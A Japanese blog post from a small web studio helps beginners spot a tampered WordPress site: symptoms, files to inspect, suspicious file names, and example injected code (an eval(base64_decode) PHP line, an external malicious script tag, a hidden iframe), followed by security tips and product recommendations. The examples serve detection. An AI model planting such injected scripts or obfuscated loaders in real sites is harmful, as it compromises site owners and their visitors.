こんにちは、Fukuoka Web Works の Lucy です。
今回は、私自身が体験したWordPressサイトの改ざん被害を踏まえて、初心者でもチェックしやすい「不審なファイル」や「怪しいコードの例」をご紹介します。
🔎 改ざんのサインとは?
以下のような症状が出ていたら、サイトが改ざんされている可能性があります:
- Google Search Consoleに登録されていないはずのURLが大量に存在
- 突然アクセス数が減る・不自然なURLからアクセスが来る
- サイト表示が崩れている、またはリダイレクトされる
🗂 チェックすべきファイル・ディレクトリ一覧
以下は、改ざん時によくいじられる場所です:
.htaccess(不審なリダイレクトや長文コードに注意)wp-config.php(データベース情報が書かれており要注意)wp-content/uploads/(見慣れないPHPファイルがあると危険)wp-content/plugins/やthemes/(勝手にファイル追加されることも)
💣 よくある不審ファイル名例
wp-xmlrpc.php(似てるけど存在しないファイル)index1.php、error_log.phpwp-tmp.php、adminer.phpなど- 見慣れない長いランダム文字列のPHPファイル
🧪 不審なコード例
以下のようなコードが混入していたら危険です:
<?php eval(base64_decode("長い文字列")); ?><script src="http://悪意のあるドメイン/○○.js"></script><iframe src="http://example.com/malware" width="0" height="0"></iframe>🧰 安全のための基本チェックリスト
- WordPress本体・プラグイン・テーマを最新版に
- 使っていないテーマやプラグインは削除
- ファイル更新日が「最近」になっていないか確認
- アクセスログ(Xserverなら「アクセス解析」)を確認
- 信頼できるセキュリティソフトやVPNで安全を確保
🛡️ おすすめのセキュリティ&バックアップ対策(収益化導線)
私自身が導入して安心できたツールを紹介します:
- ノートン 360:高機能な総合セキュリティ
- ESET HOME セキュリティ:軽量で使いやすい
- NordVPN:通信の盗聴対策に
- UpdraftPlus:WordPressの自動バックアップ
🔄 トラブルを防ぐには?
- 定期的なバックアップ
- ログインURL変更・二段階認証
- 管理画面を海外IPから遮断
- FTPやファイルマネージャーは必要時だけ開く
💬 最後に
改ざん被害は、初心者の私にも起こりました。でも冷静に対処すれば、修復は可能です。
このチェックリストとツール紹介が、少しでもあなたのWordPress運営の安心につながれば嬉しいです。
\ 今できる小さなセキュリティ対策から始めましょう /
